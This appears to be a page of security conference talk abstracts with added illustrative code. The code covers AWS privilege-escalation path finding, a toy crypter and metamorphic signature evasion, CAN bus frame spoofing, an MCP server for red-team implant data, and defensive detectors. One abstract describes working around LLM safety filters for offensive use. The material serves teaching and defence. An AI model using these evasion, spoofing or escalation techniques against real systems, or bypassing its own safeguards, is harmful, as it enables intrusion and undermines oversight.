Conference opening by OrangeCon Orga
Modern cybersecurity, as we all know today, is the result of years of transformation. It was back in the 80s when pioneering hacking enthusiasts began aggregating in self-organized communities, exploring the boundaries and capabilities of computer systems and networks. These individuals, often seen as alternative personalities who struggled to fit into an increasingly globalized and controlled society, found their freedom within the hacking subculture.
Driven by passion and curiosity, this movement rapidly grew, creating digital communication platforms for virtual connections, and organizing hacking camps and conferences for social gatherings. Naturally, this initial wave of pioneering geeks matured, with many transitioning into responsible adults. Some went on to establish businesses, offering security services and developing products to meet the growing demands of a growing security market.
In this keynote, we explore this significant social transformation and reflect on its current state: a cybersecurity realm dominated by large-scale multinational corporations where individuals are not necessarily viewed as like-minded enthusiasts driven by passion and curiosity, but as part of a workforce that can be replaced by autonomous systems to cut costs and maximize profits.
A Steering of Roaming (SoR) solution in the telecom world is a component used by mobile network operators to manage which networks their subscribers connect to when roaming in other countries. While fuzzing a globally used SoR component, we discovered a remote code execution vulnerability that could be exploited from the position of other telecom operators. In this talk we want to take you with us on the journey from fuzzing setup to crash discovery and initial exploitation, all the way to overcoming the network isolation and protocol constraints to craft an exploit that allows for two-way communication.
An insightful and practical talk about how accessibility and security are linked, how you can solve common problems that could arise for people using assistive devices or software, and what to gain from doing so.
When investigating the security of a smart device, we often encounter a very limited attack surface with no open ports, encrypted network traffic, and no logging. In this session, Wilco will show how to break through these barriers on an ESP32, a microcontroller widely used in IoT devices, such as smart switches, EV charging stations, and many other smart home devices.
Wilco will present techniques for obtaining, reverse engineering, and patching the firmware of an ESP32, and show these techniques in practice during demo sections by disabling certificate pinning and enabling debug logging on an ESP32 device.
After this session, you will have the knowledge and skills to start reverse engineering your own ESP32-based IoT devices, opening up new paths for vulnerability research.
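The first step of the workflow described above is pulling the flash contents and finding the application image inside it. As an added example (my own code, not Wilco's material or ESP-IDF's), the parser below reads an ESP-IDF partition table dump (by default 0xC00 bytes at flash offset 0x8000) and lists the app partitions worth dumping and patching. The table bytes are constructed inline; the entry layout and type/subtype numbers are those of ESP-IDF's partition table format.

```python
import struct

# ESP-IDF partition table: 32-byte little-endian entries at flash offset 0x8000 (default),
# terminated by an optional MD5 entry (magic 0xEBEB) followed by erased (0xFF) flash.
ENTRY_FMT = "<2sBBII16sI"                    # magic, type, subtype, offset, size, label, flags
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)      # 32 bytes
ENTRY_MAGIC = b"\xaa\x50"
MD5_MAGIC = b"\xeb\xeb"
FLAG_ENCRYPTED = 1 << 0                      # partition contents are flash-encrypted

TYPE_NAMES = {0x00: "app", 0x01: "data"}
APP_SUBTYPES = {0x00: "factory", 0x20: "test", **{0x10 + n: f"ota_{n}" for n in range(16)}}
DATA_SUBTYPES = {0x00: "ota", 0x01: "phy", 0x02: "nvs", 0x03: "coredump",
                 0x04: "nvs_keys", 0x05: "efuse", 0x81: "fat", 0x82: "spiffs"}


def build_entry(ptype, subtype, offset, size, label, flags=0):
    """Serialise one entry (used here only to construct the sample table)."""
    return struct.pack(ENTRY_FMT, ENTRY_MAGIC, ptype, subtype, offset, size,
                       label.encode().ljust(16, b"\0"), flags)


def parse_partition_table(blob):
    """Return the partitions described by a raw table dump."""
    parts = []
    for pos in range(0, len(blob) - ENTRY_SIZE + 1, ENTRY_SIZE):
        chunk = blob[pos:pos + ENTRY_SIZE]
        if chunk[:2] != ENTRY_MAGIC:         # MD5 entry or 0xFF padding ends the table
            break
        _, ptype, subtype, offset, size, label, flags = struct.unpack(ENTRY_FMT, chunk)
        subs = APP_SUBTYPES if ptype == 0x00 else DATA_SUBTYPES
        parts.append({
            "label": label.rstrip(b"\0").decode(),
            "type": TYPE_NAMES.get(ptype, f"0x{ptype:02x}"),
            "subtype": subs.get(subtype, f"0x{subtype:02x}"),
            "offset": offset,
            "size": size,
            "encrypted": bool(flags & FLAG_ENCRYPTED),
        })
    return parts


def app_partitions(parts):
    """The partitions holding executable images: the ones to dump, reverse and patch."""
    return [p for p in parts if p["type"] == "app"]


# Constructed sample: a common single-app layout, the MD5 entry (dummy digest), erased flash.
SAMPLE_TABLE = (
    build_entry(0x01, 0x02, 0x9000, 0x6000, "nvs")
    + build_entry(0x01, 0x01, 0xF000, 0x1000, "phy_init")
    + build_entry(0x00, 0x00, 0x10000, 0x100000, "factory")
    + build_entry(0x01, 0x82, 0x110000, 0x2F0000, "storage")
    + MD5_MAGIC + b"\xff" * 14 + bytes(16)
    + b"\xff" * 64
)

if __name__ == "__main__":
    for p in parse_partition_table(SAMPLE_TABLE):
        print(f"{p['label']:<12} {p['type']}/{p['subtype']:<8} "
              f"off=0x{p['offset']:06x} size=0x{p['size']:06x} enc={p['encrypted']}")
```

On a real device the table comes from `esptool.py -p <port> read_flash 0x8000 0xC00 ptable.bin`; the offset and size of the `app/factory` entry then tell you what range to `read_flash` for the image to patch, and `write_flash` puts the patched image back. If any entry reports `encrypted`, or secure boot is enabled, a dumped image is ciphertext and a patched one will not be accepted; check that before investing time in the patch.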
The SOHO Smashup is a famous category in the IoT focused edition of Pwn2Own. Contestants are challenged to exploit a router from the WAN side and then use that device to exploit a second device on the internal LAN. Last year, we took them up on this challenge and successfully demonstrated a 0day exploit chain against a QNAP router and pivoting to a TrueNAS system. In this presentation, we'll describe how we performed our research and the vulnerabilities we found.
Designed for both Blue and Red teams, this hands-on workshop is designed to equip participants with a deep dive into AWS enumeration techniques and detection opportunities. Through guided labs, attendees will learn how attackers can use policy misconfigurations to identify paths to their objectives. For defenders, we will discuss real-world detection opportunities, log sources, and effective monitoring strategies to identify suspicious enumeration activity before it escalates into full-blown compromise.
Along the way we introduce dAWShund, a new tool designed to map and visualize AWS resource relationships, helping Red Teams identify attack paths and Blue Teams strengthen defenses to help put a leash on naughty permissions. The idea is to hold an interactive workshop fostering and encouraging discussions among participants.
By the end of the workshop, attendees will be able to:
- Understand the differences between AWS resource and policy types (TL;DR: it’s a hot mess)
- Get a grasp of permissions validation (a bigger hot mess)
- Spot detection opportunities for enumeration (we'll use Sentinel and KQL)
- Discuss areas of improvement for the future
Technical requirements for the audience:
- Don't forget to bring your own laptop
- Basic knowledge of AWS; although all terminology will be explained.
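Permissions validation is where most of the "hot mess" lives: a request is allowed only if some identity policy allows it and no policy explicitly denies it. As an added example (not dAWShund or any AWS code), the evaluator below implements that core rule for identity-based policies over constructed sample policies, and then asks the enumeration question an attacker asks: which well-known escalation paths are fully allowed? Conditions, SCPs, permission boundaries and resource policies are deliberately not modelled; the account id, role names and bucket names are fictional.

```python
import fnmatch

# Well-documented action combinations that let a principal escalate its own privileges.
PRIVESC_PATHS = {
    "passrole-lambda": ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"],
    "create-access-key": ["iam:CreateAccessKey"],
    "attach-user-policy": ["iam:AttachUserPolicy"],
    "update-assume-role-policy": ["iam:UpdateAssumeRolePolicy", "sts:AssumeRole"],
}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _matches(patterns, value, case_insensitive):
    # IAM wildcards: '*' matches any run, '?' one character. Action names are
    # case-insensitive, resource ARNs are matched as written.
    if case_insensitive:
        return any(fnmatch.fnmatchcase(value.lower(), p.lower()) for p in _as_list(patterns))
    return any(fnmatch.fnmatchcase(value, p) for p in _as_list(patterns))


def statement_applies(stmt, action, resource):
    """Does this statement's (Not)Action and (Not)Resource cover the request?"""
    if "Action" in stmt:
        if not _matches(stmt["Action"], action, True):
            return False
    elif "NotAction" in stmt and _matches(stmt["NotAction"], action, True):
        return False
    if "Resource" in stmt:
        if not _matches(stmt["Resource"], resource, False):
            return False
    elif "NotResource" in stmt and _matches(stmt["NotResource"], resource, False):
        return False
    return True


def evaluate(policies, action, resource):
    """Identity-policy evaluation: explicit Deny beats Allow; no Allow is an implicit Deny.
    Statements with a Condition are skipped because they need request context, so this
    can under-report both allows and denies (simplification)."""
    allowed = False
    for pol in policies:
        for stmt in _as_list(pol["Statement"]):
            if "Condition" in stmt or not statement_applies(stmt, action, resource):
                continue
            if stmt["Effect"] == "Deny":
                return "explicit_deny"
            allowed = True
    return "allow" if allowed else "implicit_deny"


def find_privesc_paths(policies, resource="*"):
    """Known escalation paths whose every action is allowed on `resource`."""
    return sorted(name for name, actions in PRIVESC_PATHS.items()
                  if all(evaluate(policies, a, resource) == "allow" for a in actions))


# Constructed policies for a fictional "developer" principal.
DEV_POLICIES = [
    {"Version": "2012-10-17", "Statement": [
        {"Sid": "LambdaDev", "Effect": "Allow",
         "Action": ["lambda:*", "iam:PassRole", "iam:ListRoles", "s3:GetObject"],
         "Resource": "*"}]},
    {"Version": "2012-10-17", "Statement": [
        {"Sid": "NoSecrets", "Effect": "Deny", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::corp-secrets/*"}]},
]

if __name__ == "__main__":
    for action, res in [("s3:GetObject", "arn:aws:s3:::corp-secrets/db.env"),
                        ("s3:GetObject", "arn:aws:s3:::corp-public/index.html"),
                        ("ec2:RunInstances", "*")]:
        print(f"{action:<20} {res:<40} {evaluate(DEV_POLICIES, action, res)}")
    print("privesc paths:", find_privesc_paths(DEV_POLICIES))
```

The authoritative answer for a real principal comes from `aws iam simulate-principal-policy`, which does include conditions, boundaries and SCPs; the value of a local evaluator like this is that it runs over policy documents you already enumerated without making further API calls that a defender might be watching for.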
In this workshop, we will use tools developed by Didier Stevens to analyse malicious Cobalt Strike beacons and decrypt their traffic.
There used to be a time when a blue teamer could say: "this sample I just analyzed is a Cobalt Strike beacon: I'm sure this is a pentest".
That is no longer the case: Cobalt Strike has become very popular with common criminals, and even some APT crews. Nowadays, if you encounter a Cobalt Strike sample, your organization is more likely to be under real attack than under simulated attack.
Pack, obfuscate, or encrypt your malware as much as you want to prevent detection. This works reasonably well, but ultimately your malware always runs somewhere in the memory of a computer. This is an inherent problem with all of the aforementioned techniques. At some point during execution, the payload that you have tried to hide as much as possible is decrypted to plain text, because only then can it be executed properly.
In this presentation, you will learn more about the hurdles of such polymorphic malware and how to detect it. I then introduce you to the concept of modern metamorphic malware and how this type of malware circumvents static and in-memory detection. I demonstrate that static in-memory detection is now completely dead, and we can no longer rely on it, especially when practical implementations of metamorphic malware become publicly available.
As the icing on the cake, I publish such a practical implementation: Dittobytes. Dittobytes is a project for true metamorphic cross-compilation of C-code to Truly Position Independent Code (PIC). Malware compiled with Dittobytes runs everywhere natively — in any process, on Windows, Mac, and Linux, and both on X86 and ARM64. The best part? It's different every time you compile it!
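The argument in the two paragraphs above is easy to reproduce on a toy scale. The following is an added illustration of my own, not Dittobytes and not real malware: a five-byte x86 instruction stands in for the "known-bad" pattern a signature keys on, a XOR crypter hides it on disk, the unpacked buffer exposes it again exactly as the text says, and a metamorphic rewrite substitutes semantically equivalent encodings so that neither the packed nor the unpacked bytes match while the behaviour (zero `eax`) is unchanged. Instruction encodings are standard x86; everything else is constructed.

```python
import hashlib

# Toy "malicious" instruction a static rule might key on: x86 `mov eax, 0`.
SIGNATURE = bytes.fromhex("b800000000")
# Same effect, different bytes (padded with nop to keep the 5-byte length).
EQUIVALENTS = [
    bytes.fromhex("31c0909090"),   # xor eax, eax ; nop ; nop ; nop
    bytes.fromhex("33c0909090"),   # xor eax, eax (alternate encoding)
    bytes.fromhex("29c0909090"),   # sub eax, eax
    bytes.fromhex("2bc0909090"),   # sub eax, eax (alternate encoding)
]
# Constructed payload: push ebp / mov ebp,esp / <signature> / pop ebp / ret.
PAYLOAD = bytes.fromhex("5589e5") + SIGNATURE + bytes.fromhex("5dc3")
KEY = b"\x5a\xa5\x3c"


def xor_crypt(data, key=KEY):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(payload):
    """What the crypter writes to disk: ciphertext only."""
    return xor_crypt(payload)


def unpack(blob):
    """What the stub must do at runtime, right before jumping into the code."""
    return xor_crypt(blob)


def signature_hit(buf, sig=SIGNATURE):
    """A byte-pattern check, whether run over a file or over a process memory region."""
    return sig in buf


def metamorph(payload, seed):
    """Rewrite the payload with an equivalent encoding chosen by `seed`: same behaviour,
    different bytes, so the plaintext in memory never matches SIGNATURE either."""
    return payload.replace(SIGNATURE, EQUIVALENTS[seed % len(EQUIVALENTS)])


def demo():
    packed = pack(PAYLOAD)
    variants = [metamorph(PAYLOAD, s) for s in range(len(EQUIVALENTS))]
    return {
        "static_detects_packed": signature_hit(packed),          # crypter defeats the file scan
        "memory_detects_unpacked": signature_hit(unpack(packed)), # plaintext reappears at runtime
        "memory_detects_metamorphic": [signature_hit(v) for v in variants],
        "distinct_variants": len({hashlib.sha256(v).hexdigest() for v in variants}),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The takeaway for detection engineering is in the last two values: once the bytes differ per build, byte patterns over memory lose their grip and you are left with behavioural signals (what the code does to the process, the kernel and the network) rather than what it looks like.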
This presentation introduces a stealthy technique for injecting arbitrary extensions into Chromium-based browsers by manipulating the Preferences file.
The method, which remains relatively obscure, expands on the groundwork laid by Pablo Picazo-Sanchez, Gerardo Schneider, and Andrei Sabelfeld in their 2020 whitepaper.
The focus of the presentation is on refining and enhancing this approach to circumvent recent security measures implemented in the latest Chromium versions. It demonstrates the automation of this process through an exploitation script and showcases various post-exploitation attacks that leverage the Chromium extension API, which permits:
- Stealing cookies and localStorage credentials
- Reading the browsing history
- Partial access to the file system
- And much more ...
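A practitioner's first question after such a talk is how to spot an injected entry. As an added example (my own, not the speaker's exploitation script), the audit below parses the `extensions.settings` map of a Chromium `Preferences` file and flags entries that do not look like Web Store installs: `from_webstore` false, an absolute on-disk path where store installs use a path relative to the profile's Extensions directory, or an id outside the 32-character `a`-`p` format. The sample file is constructed; the `location` value 4 is Chromium's "unpacked" install location (verify against your Chromium version) and is printed for context only.

```python
import json
import ntpath
import posixpath

# Permissions that give an injected extension the post-exploitation reach listed above.
SENSITIVE_PERMISSIONS = {"cookies", "history", "<all_urls>", "webRequest",
                         "tabs", "nativeMessaging", "debugger"}
STORE_ID_ALPHABET = set("abcdefghijklmnop")


def _is_absolute(path):
    # Store installs are recorded relative to <profile>/Extensions; an absolute path means the
    # extension was loaded from an arbitrary directory, which is what Preferences injection does.
    return posixpath.isabs(path) or ntpath.isabs(path) or ntpath.splitdrive(path)[0] != ""


def audit_preferences(prefs_json):
    """Return the extension entries in a Preferences file that look injected or side-loaded."""
    prefs = json.loads(prefs_json)
    settings = prefs.get("extensions", {}).get("settings", {})
    findings = []
    for ext_id, entry in settings.items():
        reasons = []
        if len(ext_id) != 32 or set(ext_id) - STORE_ID_ALPHABET:
            reasons.append("id is not a 32-character a-p extension id")
        if not entry.get("from_webstore", False):
            reasons.append("from_webstore is false")
        path = entry.get("path", "")
        if _is_absolute(path):
            reasons.append(f"absolute install path: {path}")
        if not reasons:
            continue
        manifest = entry.get("manifest", {})
        risky = sorted(set(manifest.get("permissions", [])) & SENSITIVE_PERMISSIONS)
        findings.append({
            "id": ext_id,
            "name": manifest.get("name", "?"),
            "enabled": entry.get("state", 1) == 1,
            "location": entry.get("location"),
            "reasons": reasons,
            "sensitive_permissions": risky,
        })
    return findings


# Constructed Preferences excerpt: one ordinary store extension, one injected unpacked one.
SAMPLE_PREFS = json.dumps({"extensions": {"settings": {
    "bcdefghijklmnopabcdefghijklmnopa": {
        "from_webstore": True, "location": 1, "state": 1,
        "path": "bcdefghijklmnopabcdefghijklmnopa/2.1_0",
        "manifest": {"name": "Notes", "version": "2.1", "permissions": ["storage"]}},
    "abcdefghijklmnopabcdefghijklmnop": {
        "from_webstore": False, "location": 4, "state": 1,
        "path": "C:\\Users\\victim\\AppData\\Local\\Temp\\upd",
        "manifest": {"name": "Updater", "version": "1.0",
                     "permissions": ["cookies", "history", "<all_urls>"]}},
}}})

if __name__ == "__main__":
    for f in audit_preferences(SAMPLE_PREFS):
        print(f["id"], f["name"], f["reasons"], f["sensitive_permissions"])
```

Treat this as a tripwire, not a control: an attacker who can write the profile can also write whatever values make an entry look legitimate, so the durable defence is the `ExtensionInstallAllowlist`/`ExtensionInstallBlocklist` policy set (which the browser enforces regardless of what the profile file says) plus file-integrity monitoring on the profile directory.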
From covert state-backed espionage to financially motivated cybercrime, from politically charged hacktivism to digital sabotage—threat actors targeting the Netherlands come in many forms, and their tactics are constantly evolving.
In this talk, the Cyber Threat Intelligence (CTI) team of the Dutch National Cyber Security Centre (NCSC) offers a rare behind-the-scenes look at how they investigate and analyze these threats in support of the Dutch government and critical infrastructure sectors.
Through real-world case studies, we’ll demonstrate how our team monitors, classifies, and contextualizes activity from a wide range of threat actors—including nation-states, cybercriminal groups, hacktivists, and actors with sabotage-related intents. You’ll see how this intelligence fuels key NCSC products like the CTI-Report and the quarterly Threat Landscape Analysis, which provide essential context and action-oriented insights to our partners.
We’ll also present Pharos for the first time: a powerful, in-house developed tool that continuously scans the internet for signs of malicious infrastructure. By leveraging sources like Censys, Shodan, and VirusTotal through custom queries, Pharos helps us identify suspicious IPs, domains, certificates, and more—before they’re used in active campaigns. We will explain how we leverage this type of intelligence, not only for ourselves but within a broader cybersecurity ecosystem.
Join us for a deep dive into the operational world of national CTI: where strategic intelligence meets technical investigation, and where safeguarding the digital security of the Netherlands is a daily mission.
Red Team operations often involve juggling dozens of tools, manual workflows, and fragile automation. Is AI finally going to save us and help us tie things together? Or are we adding yet another layer of unnecessary complexity? In this talk, I will share how we are using Large Language Models (LLMs) to orchestrate Red Team operations by integrating them directly into our infrastructure, using custom Model Context Protocol (MCP) servers.
MCP provides LLMs with access to in-house tools and data, providing a natural language interface between operators and backend systems. I will walk through how we wired it up to perform tasks like querying implant data, launching redirectors, checking logs, and flagging OPSEC risks in payloads. The focus will be on practical implementation details: what worked, what didn’t, and how we handled LLM limitations in the context of real operations.
You will learn how MCP works under the hood, what components are needed, how it interfaces with tools, and how we deal with model safety filters that can get in the way of offensive use cases. The goal is to show how accessible it is to build your own interface, and how LLMs can become a useful part of your Red Team toolkit today. I will conclude with ideas for where this kind of integration makes the most sense, and where it still falls short.
This talk is for anyone curious about leveraging LLMs to finally sweet-talk your tooling into doing what you want it to, whether in security, operations, or elsewhere.
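For readers who want to see "how MCP works under the hood" before the talk: an MCP server is a JSON-RPC 2.0 endpoint that answers `initialize`, advertises tools through `tools/list` (name, description, JSON-schema input) and executes them through `tools/call`, returning content blocks the model can read. The dispatcher below is an added example of my own, not the speaker's servers and not the official SDK: it follows those message shapes with two fictional red-team tools over constructed data (implant records and an illustrative list of strings that give a payload away). Transport (stdio or HTTP) is reduced to one JSON document per line.

```python
import json

# Constructed backend data a C2 might expose to the model (fictional hosts and users).
IMPLANTS = [
    {"id": "imp-01", "host": "WS-FIN-07", "user": "j.doe", "alive": True},
    {"id": "imp-02", "host": "SRV-DB-01", "user": "SYSTEM", "alive": False},
]
# Illustrative strings whose presence in a payload would hand defenders an easy signature.
OPSEC_MARKERS = [b"mimikatz", b"beacon.dll", b"AmsiScanBuffer"]


def tool_query_implants(alive=None):
    rows = [i for i in IMPLANTS if alive is None or i["alive"] == alive]
    return json.dumps(rows)


def tool_opsec_check(payload_hex):
    blob = bytes.fromhex(payload_hex).lower()
    hits = [m.decode() for m in OPSEC_MARKERS if m.lower() in blob]
    return json.dumps({"risky": bool(hits), "markers": hits})


TOOLS = {
    "query_implants": {
        "description": "List implants, optionally filtered on liveness.",
        "inputSchema": {"type": "object", "properties": {"alive": {"type": "boolean"}}},
        "fn": tool_query_implants},
    "opsec_check": {
        "description": "Scan a hex-encoded payload for strings defenders signature on.",
        "inputSchema": {"type": "object", "properties": {"payload_hex": {"type": "string"}},
                        "required": ["payload_hex"]},
        "fn": tool_opsec_check},
}


def _error(rid, code, message):
    return {"jsonrpc": "2.0", "id": rid, "error": {"code": code, "message": message}}


def handle(request):
    """Serve one JSON-RPC request using the MCP method names and result shapes."""
    rid, method = request.get("id"), request.get("method")
    params = request.get("params") or {}
    if method == "initialize":
        result = {"protocolVersion": "2024-11-05", "capabilities": {"tools": {}},
                  "serverInfo": {"name": "redteam-mcp-demo", "version": "0.1"}}
    elif method == "tools/list":
        result = {"tools": [{"name": n, "description": t["description"],
                             "inputSchema": t["inputSchema"]} for n, t in TOOLS.items()]}
    elif method == "tools/call":
        tool = TOOLS.get(params.get("name"))
        if tool is None:
            return _error(rid, -32602, f"unknown tool: {params.get('name')}")
        try:
            text = tool["fn"](**(params.get("arguments") or {}))
        except (TypeError, ValueError) as exc:     # bad arguments become a tool error, not a crash
            result = {"content": [{"type": "text", "text": str(exc)}], "isError": True}
        else:
            result = {"content": [{"type": "text", "text": text}], "isError": False}
    else:
        return _error(rid, -32601, f"method not found: {method}")
    return {"jsonrpc": "2.0", "id": rid, "result": result}


def serve_line(line):
    """Line-oriented transport: one JSON request in, one JSON response out."""
    return json.dumps(handle(json.loads(line)))


def call_tool(name, **arguments):
    """Convenience wrapper: run tools/call and return the parsed tool output."""
    resp = handle({"jsonrpc": "2.0", "id": 0, "method": "tools/call",
                   "params": {"name": name, "arguments": arguments}})
    return json.loads(resp["result"]["content"][0]["text"])


if __name__ == "__main__":
    print(serve_line('{"jsonrpc":"2.0","id":1,"method":"tools/list"}'))
    print(call_tool("query_implants", alive=True))
```

Two things this skeleton makes obvious: the model only ever sees the tool descriptions and the text you return, so the description is effectively a prompt and deserves the same review as one; and every tool call is an action the model chose, so the server, not the model, is where you enforce which operator may launch what (a redirector is not something an LLM should be able to start on its own say-so).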
Containerizing an application unlocks a wealth of possibilities: in theory, containers can be easily scaled, managed, recreated, defined as code, and more. However, the convenience of these powerful tools sometimes leads us to overlook the underlying mechanics and the security implications involved. While many aspects of developing with containers resemble those of traditional applications, containers also introduce unique characteristics and challenges that must not be ignored.
As modern vehicles evolve into complex networks of software and hardware, they become increasingly susceptible to cyber threats. In this hands-on workshop, we will explore how vulnerabilities in automotive systems can be identified, analyzed, and demonstrated. Participants will dive into real-world scenarios using practical tools and techniques to penetrate vehicle networks, uncover security flaws, and experiment with live attacks. This workshop bridges the gap between theoretical knowledge and practical skills, empowering attendees to better understand the increasingly connected automotive landscape.
The session will begin with an introduction to automotive security concepts and the architecture of modern vehicle networks. Participants will then learn how to interact directly with the Controller Area Network (CAN) bus, the central communication system in most vehicles. Through guided, hands-on exercises, they will reverse engineer messages to the instrument cluster and send spoofed signals to manipulate displayed information.
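The exercise described above (find which bytes carry a signal, then replay a modified frame) looks like the following in code. This is an added example of my own, not the workshop's material; the frame id, the speed encoding and the rolling counter are invented for the illustration and do not describe any real vehicle, and the three captured frames are constructed. The `can_frame` layout and the `cansend` notation are those of Linux SocketCAN and can-utils.

```python
import struct

# Hypothetical instrument-cluster frame (invented): arbitration id 0x3D8, 8 data bytes,
# speed as big-endian uint16 in bytes 0-1 in units of 0.01 km/h, 4-bit rolling counter
# in the low nibble of byte 7. Real buses differ; this is what the RE step has to find.
SPEED_ID = 0x3D8


def decode_speed(data):
    return struct.unpack(">H", data[0:2])[0] / 100


def counter_of(data):
    return data[7] & 0x0F


def encode_speed(kmh, counter):
    """Payload for a spoofed speed. The counter must keep rolling: a cluster or IDS that
    tracks it will ignore frames whose counter does not advance."""
    raw = int(round(kmh * 100))
    if not 0 <= raw <= 0xFFFF:
        raise ValueError("speed does not fit a 16-bit field")
    return struct.pack(">H", raw) + bytes(5) + bytes([counter & 0x0F])


def varying_bytes(frames):
    """RE helper: which byte positions change across captured frames of one id?"""
    return {i for i in range(8) if len({f[i] for f in frames}) > 1}


def socketcan_frame(can_id, data):
    """Classic 'struct can_frame' (16 bytes) as a raw CAN socket expects it."""
    if len(data) > 8:
        raise ValueError("classic CAN carries at most 8 data bytes")
    return struct.pack("=IB3x8s", can_id, len(data), data.ljust(8, b"\0"))


def cansend_syntax(can_id, data):
    """Same frame in can-utils notation, e.g. `cansend can0 3D8#109A000000000006`."""
    return f"{can_id:03X}#{data.hex().upper()}"


# Constructed capture of three frames while accelerating (40.00, 42.50, 43.11 km/h).
CAPTURE = [
    bytes.fromhex("0FA0000000000005"),
    bytes.fromhex("109A000000000006"),
    bytes.fromhex("10D7000000000007"),
]

if __name__ == "__main__":
    print("bytes that change:", sorted(varying_bytes(CAPTURE)))
    for f in CAPTURE:
        print(f"{decode_speed(f):6.2f} km/h  counter={counter_of(f)}")
    spoof = encode_speed(250.0, counter_of(CAPTURE[-1]) + 1)
    print("spoofed frame:", cansend_syntax(SPEED_ID, spoof))
```

Reading the varying-byte set is the whole reverse-engineering loop in miniature: bytes 0-1 move with the speed, byte 7 moves on every frame regardless, so the counter has to be recognised and imitated rather than copied. On Linux the packed frame can be sent through `socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)` bound to the interface; on a bench setup also expect the real ECU to keep transmitting, so the spoofed value only wins while you out-pace it.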
Let me walk you through the modern techniques hackers use today to take over cloud accounts - methods that are far more stealthy and persistent than most users or security teams realize.
We'll examine how attackers steal session cookies from unsuspecting victims, silently modify email account settings to intercept or redirect messages, and leverage OAuth applications to maintain long-term access even if the user changes their password or enables two-factor authentication. These tactics often leave no alerts or obvious signs, allowing the attacker to persist undetected for weeks or even months.
To better understand and replicate these threats, we've developed two custom red team tools: ATOLS and FASSA.
These tools simulate real-world attack paths used by adversaries, allowing organizations to test their detection capabilities and response processes in a controlled and safe environment.
Today, we’re going to show you exactly how they work and what you can do to stay ahead.
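Each of the three persistence tactics named above leaves a trace in the tenant's audit log even when it raises no alert, which is what a detection for them has to be built on. The detector below is an added example of my own, not ATOLS or FASSA: it runs a handful of rules over constructed events in a simplified Microsoft 365 unified-audit-log shape (operation and parameter names follow the real log; the flat `SessionId`/`ClientIP` fields and the consent `NewValue` format are simplifications, and every identity and address is fictional). The rules flag inbox rules and mailbox settings that forward externally or delete mail, user consent to an app with mailbox scopes, and one session id used from two IPs in a short window, the footprint of a replayed session token.

```python
from collections import defaultdict
from datetime import datetime, timedelta

INTERNAL_DOMAINS = {"contoso.example"}
FORWARDING_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",    # New-/Set-InboxRule
                     "ForwardingSmtpAddress", "ForwardingAddress")           # Set-Mailbox
HIGH_RISK_SCOPES = {"Mail.ReadWrite", "Mail.Read", "MailboxSettings.ReadWrite",
                    "Files.ReadWrite.All", "offline_access"}

# Constructed events (simplified schema, fictional tenant). The first four tell one takeover story.
EVENTS = [
    {"CreationTime": "2025-09-01T08:00:00", "Operation": "UserLoggedIn",
     "UserId": "j.doe@contoso.example", "ClientIP": "203.0.113.10", "SessionId": "b7f1-1111"},
    {"CreationTime": "2025-09-01T08:07:00", "Operation": "UserLoggedIn",
     "UserId": "j.doe@contoso.example", "ClientIP": "198.51.100.77", "SessionId": "b7f1-1111"},
    {"CreationTime": "2025-09-01T08:09:00", "Operation": "New-InboxRule",
     "UserId": "j.doe@contoso.example",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "j.doe.backup@mail.example"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"CreationTime": "2025-09-01T08:11:00", "Operation": "Set-Mailbox",
     "UserId": "j.doe@contoso.example",
     "Parameters": [{"Name": "ForwardingSmtpAddress", "Value": "smtp:j.doe.backup@mail.example"}]},
    {"CreationTime": "2025-09-01T08:12:00", "Operation": "Consent to application.",
     "UserId": "j.doe@contoso.example",
     "ModifiedProperties": [{"Name": "ConsentAction.Permissions",
                             "NewValue": "Mail.ReadWrite offline_access User.Read"}]},
    {"CreationTime": "2025-09-01T09:30:00", "Operation": "New-InboxRule",
     "UserId": "a.smith@contoso.example",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
]


def _param(ev, name):
    return next((p["Value"] for p in ev.get("Parameters", []) if p["Name"] == name), None)


def _is_external(address):
    address = address.lower()
    if address.startswith("smtp:"):
        address = address[5:]
    return address.split("@")[-1] not in INTERNAL_DOMAINS


def mailbox_findings(ev):
    out = []
    targets = [_param(ev, p) for p in FORWARDING_PARAMS]
    if any(t and _is_external(t) for t in targets):
        out.append(f"{ev['Operation']} forwards mail to an external address")
    if _param(ev, "DeleteMessage") == "True":
        out.append("inbox rule deletes matching messages (hides the trail)")
    return out


def consent_findings(ev):
    props = {p["Name"]: p.get("NewValue", "") for p in ev.get("ModifiedProperties", [])}
    risky = sorted(set(props.get("ConsentAction.Permissions", "").split()) & HIGH_RISK_SCOPES)
    return [f"user consented to an app with {' '.join(risky)}"] if risky else []


def session_findings(logins, window):
    out = []
    for (user, sid), evs in logins.items():
        ips = {e["ClientIP"] for e in evs}
        times = sorted(datetime.fromisoformat(e["CreationTime"]) for e in evs)
        if len(ips) > 1 and times[-1] - times[0] <= window:
            out.append((user, f"session {sid} used from {len(ips)} IPs within {window}: "
                              "possible replayed session token"))
    return out


def detect(events, window=timedelta(minutes=30)):
    """Return (user, finding) pairs; one user with several findings is the pattern to escalate."""
    findings, logins = [], defaultdict(list)
    for ev in events:
        user, op = ev["UserId"], ev["Operation"]
        if op == "UserLoggedIn":
            logins[(user, ev["SessionId"])].append(ev)
        elif op in ("New-InboxRule", "Set-InboxRule", "Set-Mailbox"):
            findings += [(user, m) for m in mailbox_findings(ev)]
        elif op == "Consent to application.":
            findings += [(user, m) for m in consent_findings(ev)]
    return findings + session_findings(logins, window)


if __name__ == "__main__":
    for user, msg in detect(EVENTS):
        print(f"{user}: {msg}")
```

The session rule is the noisiest of the four (VPN hand-offs and mobile roaming change IPs legitimately), which is why it pairs badly with a single-event alert and well with the other three: a session that jumps networks and then grows a forwarding rule and an OAuth grant within minutes is the sequence these tools reproduce, and the sequence is what to alert on.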
Local name resolution poisoning attacks are almost as old as Active Directory itself, and yet the magic of Windows backward compatibility keeps them effective in 2025.
